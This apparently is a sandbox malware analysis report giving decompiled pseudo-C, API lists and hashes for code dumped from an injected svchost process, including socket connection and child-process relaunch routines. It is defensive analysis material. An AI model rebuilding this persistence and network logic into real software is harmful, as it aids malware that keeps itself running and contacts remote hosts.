                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C701937264038D9FDB72DFA4CC84FDA37A9EF48300F014532E90DCBA50E675AA048B96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                          			E04001780() {
                                                                                                                                                                                                                                                                          				char _v404;
                                                                                                                                                                                                                                                                          				signed int _v408;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v412;
                                                                                                                                                                                                                                                                          				intOrPtr _v416;
                                                                                                                                                                                                                                                                          				intOrPtr _v420;
                                                                                                                                                                                                                                                                          				void* _v424;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v428;
                                                                                                                                                                                                                                                                          				intOrPtr _v432;
                                                                                                                                                                                                                                                                          				void* _v436;
                                                                                                                                                                                                                                                                          				void* _v440;
                                                                                                                                                                                                                                                                          				void* _v444;
                                                                                                                                                                                                                                                                          				char* _t51;
                                                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                                                          				intOrPtr _t54;
                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t51 =  &_v404;
                                                                                                                                                                                                                                                                          				_push(_t51);
                                                                                                                                                                                                                                                                          				_push(0x202); // executed
                                                                                                                                                                                                                                                                          				L0400100C(); // executed
                                                                                                                                                                                                                                                                          				if(_t51 != 0) {
                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v408 = 0;
                                                                                                                                                                                                                                                                          				_v412 = 0;
                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                          					_t52 = E04001490(); // executed
                                                                                                                                                                                                                                                                          					_v416 = _t52;
                                                                                                                                                                                                                                                                          					if(_v416 > 0 && _v416 < 0x2710) {
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					Sleep(0x7530);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          				_t54 = E040023E0( *((intOrPtr*)(0x4088c1c + _v408 * 4))); // executed
                                                                                                                                                                                                                                                                          				_t91 = _t90 + 4;
                                                                                                                                                                                                                                                                          				_v420 = _t54;
                                                                                                                                                                                                                                                                          				if(_v420 != 0) {
                                                                                                                                                                                                                                                                          					E04001DC0(_v420, 0x4085600); // executed
                                                                                                                                                                                                                                                                          					_t68 = E04001470(0xc);
                                                                                                                                                                                                                                                                          					_t91 = _t91 + 0xc;
                                                                                                                                                                                                                                                                          					_v440 = _t68;
                                                                                                                                                                                                                                                                          					_v424 = _v440;
                                                                                                                                                                                                                                                                          					 *_v424 =  *(0x4088c1c + _v408 * 4);
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v424 + 4)) = _v420;
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v424 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                          					CreateThread(0, 0, E04001630, _v424, 0, 0); // executed
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v428 = 0;
                                                                                                                                                                                                                                                                          				while(_v428 < 3) {
                                                                                                                                                                                                                                                                          					_t57 = E040023E0( *((intOrPtr*)(0x4088c20 + (_v412 + _v428) * 4))); // executed
                                                                                                                                                                                                                                                                          					_t91 = _t91 + 4;
                                                                                                                                                                                                                                                                          					_v432 = _t57;
                                                                                                                                                                                                                                                                          					if(_v432 != 0) {
                                                                                                                                                                                                                                                                          						E04001DC0(_v432, 0x4085600); // executed
                                                                                                                                                                                                                                                                          						_t62 = E04001470(0xc);
                                                                                                                                                                                                                                                                          						_t91 = _t91 + 0xc;
                                                                                                                                                                                                                                                                          						_v444 = _t62;
                                                                                                                                                                                                                                                                          						_v436 = _v444;
                                                                                                                                                                                                                                                                          						 *_v436 =  *(0x4088c20 + (_v412 + _v428) * 4);
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_v436 + 4)) = _v432;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_v436 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                          						CreateThread(0, 0, E04001630, _v436, 0, 0); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v428 =  &(_v428->nLength);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                                          				Sleep(0x9c40);
                                                                                                                                                                                                                                                                          				L04001006();
                                                                                                                                                                                                                                                                          				goto L15;
                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                          0x04001789
                                                                                                                                                                                                                                                                          0x0400178f
                                                                                                                                                                                                                                                                          0x04001790
                                                                                                                                                                                                                                                                          0x04001795
                                                                                                                                                                                                                                                                          0x0400179c
                                                                                                                                                                                                                                                                          0x040019a0
                                                                                                                                                                                                                                                                          0x040019a2
                                                                                                                                                                                                                                                                          0x040019a2
                                                                                                                                                                                                                                                                          0x040017a2
                                                                                                                                                                                                                                                                          0x040017ac
                                                                                                                                                                                                                                                                          0x040017b6
                                                                                                                                                                                                                                                                          0x040017b6
                                                                                                                                                                                                                                                                          0x040017bb
                                                                                                                                                                                                                                                                          0x040017c8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001990
                                                                                                                                                                                                                                                                          0x04001990
                                                                                                                                                                                                                                                                          0x040017ec
                                                                                                                                                                                                                                                                          0x040017ff
                                                                                                                                                                                                                                                                          0x04001804
                                                                                                                                                                                                                                                                          0x04001807
                                                                                                                                                                                                                                                                          0x04001814
                                                                                                                                                                                                                                                                          0x04001822
                                                                                                                                                                                                                                                                          0x0400182c
                                                                                                                                                                                                                                                                          0x04001831
                                                                                                                                                                                                                                                                          0x04001834
                                                                                                                                                                                                                                                                          0x04001840
                                                                                                                                                                                                                                                                          0x04001859
                                                                                                                                                                                                                                                                          0x04001867
                                                                                                                                                                                                                                                                          0x04001870
                                                                                                                                                                                                                                                                          0x0400188b
                                                                                                                                                                                                                                                                          0x0400188b
                                                                                                                                                                                                                                                                          0x04001891
                                                                                                                                                                                                                                                                          0x040018ac
                                                                                                                                                                                                                                                                          0x040018cd
                                                                                                                                                                                                                                                                          0x040018d2
                                                                                                                                                                                                                                                                          0x040018d5
                                                                                                                                                                                                                                                                          0x040018e2
                                                                                                                                                                                                                                                                          0x040018f4
                                                                                                                                                                                                                                                                          0x040018fe
                                                                                                                                                                                                                                                                          0x04001903
                                                                                                                                                                                                                                                                          0x04001906
                                                                                                                                                                                                                                                                          0x04001912
                                                                                                                                                                                                                                                                          0x04001931
                                                                                                                                                                                                                                                                          0x0400193f
                                                                                                                                                                                                                                                                          0x04001948
                                                                                                                                                                                                                                                                          0x04001963
                                                                                                                                                                                                                                                                          0x04001963
                                                                                                                                                                                                                                                                          0x040018a6
                                                                                                                                                                                                                                                                          0x040018a6
                                                                                                                                                                                                                                                                          0x04001976
                                                                                                                                                                                                                                                                          0x04001981
                                                                                                                                                                                                                                                                          0x0400199b
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 04001795
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                                                                                                            • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                            • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                            • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Create$SleepThread$CountEventExitObjectProcessSingleStartupTickWaitclosesocketlstrcat
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1305884959-0
                                                                                                                                                                                                                                                                          • Opcode ID: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                                          • Instruction ID: 2f7e3e578d268ca83db2a9f917eba75e9ec579b5eb93670916da3db20cf0bcb8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14512674A01224AFFB60EF60DC59BDAB7B0AB49708F0480E8E5497B2C0D7756E84CF52
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 92 4001630-400163a 93 4001640-4001662 CoInitialize 92->93 94 400176c-4001771 92->94 95 4001766 93->95 96 4001668 93->96 95->94 97 400166f-4001676 96->97 97->95 98 400167c-400168d WaitForSingleObject 97->98 99 40016a3-40016bd GetExitCodeProcess 98->99 100 400168f-400169e TerminateProcess 98->100 101 4001761 99->101 102 40016c3-40016ca 99->102 100->95 101->97 103 40016dc-40016e3 102->103 104 40016cc-40016d7 Sleep 102->104 105 40016e5-40016f2 SetEvent 103->105 106 40016f6-4001733 CloseHandle Sleep call 40023e0 103->106 104->101 105->95 109 4001735 106->109 110 4001739-4001749 106->110 109->95 110->101 111 400174b-400175e call 4001dc0 110->111 111->101
                                                                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                                                                          			E04001630(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				int _t40;
                                                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				 *0x4003090(0); // executed
                                                                                                                                                                                                                                                                          				_v12 = 0x3e8;
                                                                                                                                                                                                                                                                          				_v16 = 0x1388;
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if( *_v8 == 0) {
                                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                                          					 *0x4003094();
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				while(_v20 <= 0x3e8) {
                                                                                                                                                                                                                                                                          					if(WaitForSingleObject( *0x4088c2c, 1) != 0) {
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						_t40 = GetExitCodeProcess( *(_v8 + 4),  &_v24); // executed
                                                                                                                                                                                                                                                                          						if(_t40 == 0) {
                                                                                                                                                                                                                                                                          							L15:
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                          							if(_v24 != 0x17d4a580) {
                                                                                                                                                                                                                                                                          								CloseHandle( *(_v8 + 4));
                                                                                                                                                                                                                                                                          								 *(_v8 + 4) = 0;
                                                                                                                                                                                                                                                                          								Sleep(0xbb8);
                                                                                                                                                                                                                                                                          								_t44 = E040023E0( *_v8);
                                                                                                                                                                                                                                                                          								_t67 = _t67 + 4;
                                                                                                                                                                                                                                                                          								 *(_v8 + 4) = _t44;
                                                                                                                                                                                                                                                                          								if( *(_v8 + 4) != 0) {
                                                                                                                                                                                                                                                                          									_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                          									if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                                                                                                                                                                                                                          										E04001DC0( *(_v8 + 4),  *((intOrPtr*)(_v8 + 8)));
                                                                                                                                                                                                                                                                          										_t67 = _t67 + 8;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L15;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								goto L16;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							SetEvent( *0x4088c2c);
                                                                                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					TerminateProcess( *(_v8 + 4), 0);
                                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L16;
                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                          0x0400163a
                                                                                                                                                                                                                                                                          0x0400176c
                                                                                                                                                                                                                                                                          0x04001771
                                                                                                                                                                                                                                                                          0x04001771
                                                                                                                                                                                                                                                                          0x04001642
                                                                                                                                                                                                                                                                          0x04001648
                                                                                                                                                                                                                                                                          0x0400164f
                                                                                                                                                                                                                                                                          0x04001659
                                                                                                                                                                                                                                                                          0x04001662
                                                                                                                                                                                                                                                                          0x04001766
                                                                                                                                                                                                                                                                          0x04001766
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001766
                                                                                                                                                                                                                                                                          0x04001668
                                                                                                                                                                                                                                                                          0x0400166f
                                                                                                                                                                                                                                                                          0x0400168d
                                                                                                                                                                                                                                                                          0x040016a3
                                                                                                                                                                                                                                                                          0x040016b5
                                                                                                                                                                                                                                                                          0x040016bd
                                                                                                                                                                                                                                                                          0x04001761
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001761
                                                                                                                                                                                                                                                                          0x040016ca
                                                                                                                                                                                                                                                                          0x040016e3
                                                                                                                                                                                                                                                                          0x040016fd
                                                                                                                                                                                                                                                                          0x04001706
                                                                                                                                                                                                                                                                          0x04001712
                                                                                                                                                                                                                                                                          0x0400171e
                                                                                                                                                                                                                                                                          0x04001723
                                                                                                                                                                                                                                                                          0x04001729
                                                                                                                                                                                                                                                                          0x04001733
                                                                                                                                                                                                                                                                          0x0400173f
                                                                                                                                                                                                                                                                          0x04001749
                                                                                                                                                                                                                                                                          0x04001759
                                                                                                                                                                                                                                                                          0x0400175e
                                                                                                                                                                                                                                                                          0x0400175e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001749
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001735
                                                                                                                                                                                                                                                                          0x040016ec
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040016ec
                                                                                                                                                                                                                                                                          0x040016d1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040016d1
                                                                                                                                                                                                                                                                          0x04001698
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001698
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04001642
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 04001685
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 04001698
                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNELBASE(?,00000000), ref: 040016B5
                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 040016D1
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 040016EC
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 040016FD
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 04001712
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProcessSleep$CloseCodeEventExitHandleInitializeObjectSingleTerminateWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 110750051-0
                                                                                                                                                                                                                                                                          • Opcode ID: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                                          • Instruction ID: d411829a3222fa01dcd82fa6bcec4b197f6087181c8baad7daf63abf5d028934
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9312A74A01204DFEB14DFA4DA98B9DB7B5FB44304F54C598E809BB280D779AE80DB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 114 4001160-4001178 socket 115 4001182-40011a9 htons gethostbyname 114->115 116 400117a-400117d 114->116 118 40011ba-40011bd 115->118 119 40011ab-40011d4 115->119 117 4001259-400125c 116->117 118->117 121 40011df-40011e5 119->121 122 4001202-4001208 121->122 123 40011e7-40011f8 connect 121->123 126 4001218-400121c 122->126 127 400120a-4001216 closesocket 122->127 124 4001200 123->124 125 40011fa-40011fe 123->125 124->121 125->122 129 4001256 126->129 130 400121e-4001251 setsockopt * 2 126->130 127->117 129->117 130->129
                                                                                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                                                                                          			E04001160(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                          				signed char _v8;
                                                                                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                                                                                          				signed char _v13;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				short _v34;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                                                                          				char* _t42;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_push(6);
                                                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                                                          				_push(2); // executed
                                                                                                                                                                                                                                                                          				L0400101E(); // executed
                                                                                                                                                                                                                                                                          				_v20 = __eax;
                                                                                                                                                                                                                                                                          				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                          					_v36 = 2;
                                                                                                                                                                                                                                                                          					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                          					L04001030();
                                                                                                                                                                                                                                                                          					_v34 = 2;
                                                                                                                                                                                                                                                                          					_push(_a4); // executed
                                                                                                                                                                                                                                                                          					L04001018(); // executed
                                                                                                                                                                                                                                                                          					_v12 = 2;
                                                                                                                                                                                                                                                                          					if(_v12 == 0) {
                                                                                                                                                                                                                                                                          						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                          					_v40 = 0;
                                                                                                                                                                                                                                                                          					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                          						_push(0x10);
                                                                                                                                                                                                                                                                          						_t42 =  &_v36;
                                                                                                                                                                                                                                                                          						_push(_t42);
                                                                                                                                                                                                                                                                          						_push(_v20); // executed
                                                                                                                                                                                                                                                                          						L04001036(); // executed
                                                                                                                                                                                                                                                                          						if(_t42 != 0) {
                                                                                                                                                                                                                                                                          							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v13 = 1;
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                          							_v44 = _a16;
                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                          							_push(0x1005);
                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                          							_push(_v20); // executed
                                                                                                                                                                                                                                                                          							L0400102A(); // executed
                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                          							_push(0x1006);
                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                          							_push(_v20); // executed
                                                                                                                                                                                                                                                                          							L0400102A(); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						return _v20;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t40 = _v20;
                                                                                                                                                                                                                                                                          					_push(_t40);
                                                                                                                                                                                                                                                                          					L04001000();
                                                                                                                                                                                                                                                                          					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v20;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04001166
                                                                                                                                                                                                                                                                          0x04001168
                                                                                                                                                                                                                                                                          0x0400116a
                                                                                                                                                                                                                                                                          0x0400116c
                                                                                                                                                                                                                                                                          0x04001171
                                                                                                                                                                                                                                                                          0x04001178
                                                                                                                                                                                                                                                                          0x04001187
                                                                                                                                                                                                                                                                          0x0400118f
                                                                                                                                                                                                                                                                          0x04001190
                                                                                                                                                                                                                                                                          0x04001195
                                                                                                                                                                                                                                                                          0x0400119c
                                                                                                                                                                                                                                                                          0x0400119d
                                                                                                                                                                                                                                                                          0x040011a2
                                                                                                                                                                                                                                                                          0x040011a9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040011ba
                                                                                                                                                                                                                                                                          0x040011b5
                                                                                                                                                                                                                                                                          0x040011c2
                                                                                                                                                                                                                                                                          0x040011c9
                                                                                                                                                                                                                                                                          0x040011cd
                                                                                                                                                                                                                                                                          0x040011df
                                                                                                                                                                                                                                                                          0x040011e7
                                                                                                                                                                                                                                                                          0x040011e9
                                                                                                                                                                                                                                                                          0x040011ec
                                                                                                                                                                                                                                                                          0x040011f0
                                                                                                                                                                                                                                                                          0x040011f1
                                                                                                                                                                                                                                                                          0x040011f8
                                                                                                                                                                                                                                                                          0x040011dc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040011dc
                                                                                                                                                                                                                                                                          0x040011fa
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040011fa
                                                                                                                                                                                                                                                                          0x04001208
                                                                                                                                                                                                                                                                          0x0400121c
                                                                                                                                                                                                                                                                          0x04001221
                                                                                                                                                                                                                                                                          0x04001224
                                                                                                                                                                                                                                                                          0x04001229
                                                                                                                                                                                                                                                                          0x0400122a
                                                                                                                                                                                                                                                                          0x0400122f
                                                                                                                                                                                                                                                                          0x04001237
                                                                                                                                                                                                                                                                          0x04001238
                                                                                                                                                                                                                                                                          0x0400123d
                                                                                                                                                                                                                                                                          0x04001242
                                                                                                                                                                                                                                                                          0x04001243
                                                                                                                                                                                                                                                                          0x04001248
                                                                                                                                                                                                                                                                          0x04001250
                                                                                                                                                                                                                                                                          0x04001251
                                                                                                                                                                                                                                                                          0x04001251
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001256
                                                                                                                                                                                                                                                                          0x0400120a
                                                                                                                                                                                                                                                                          0x0400120d
                                                                                                                                                                                                                                                                          0x0400120e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001213
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                          • htons.WS2_32(?), ref: 04001190
                                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 0400119D
                                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 040011F1
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 0400120E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 530611402-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                                          • Instruction ID: 08c5e0426ad4df4722dd3bdfc990c85badbf8b170f181f32ce41d694214c1be1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66315070A00259EBEB14DFA4C845BEEB7B6BF48318F108649E5617F2C0E7B6A9408751
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                                                                                                          			E04001490() {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				char _v524;
                                                                                                                                                                                                                                                                          				intOrPtr _v528;
                                                                                                                                                                                                                                                                          				intOrPtr _v532;
                                                                                                                                                                                                                                                                          				intOrPtr _v536;
                                                                                                                                                                                                                                                                          				signed int _v540;
                                                                                                                                                                                                                                                                          				intOrPtr _v544;
                                                                                                                                                                                                                                                                          				char _v548;
                                                                                                                                                                                                                                                                          				char _v552;
                                                                                                                                                                                                                                                                          				long _v556;
                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				_v12 = 3;
                                                                                                                                                                                                                                                                          				_v528 = 0;
                                                                                                                                                                                                                                                                          				while(_v528 < 3) {
                                                                                                                                                                                                                                                                          					_v532 = 0;
                                                                                                                                                                                                                                                                          					while(_v532 < 0x46) {
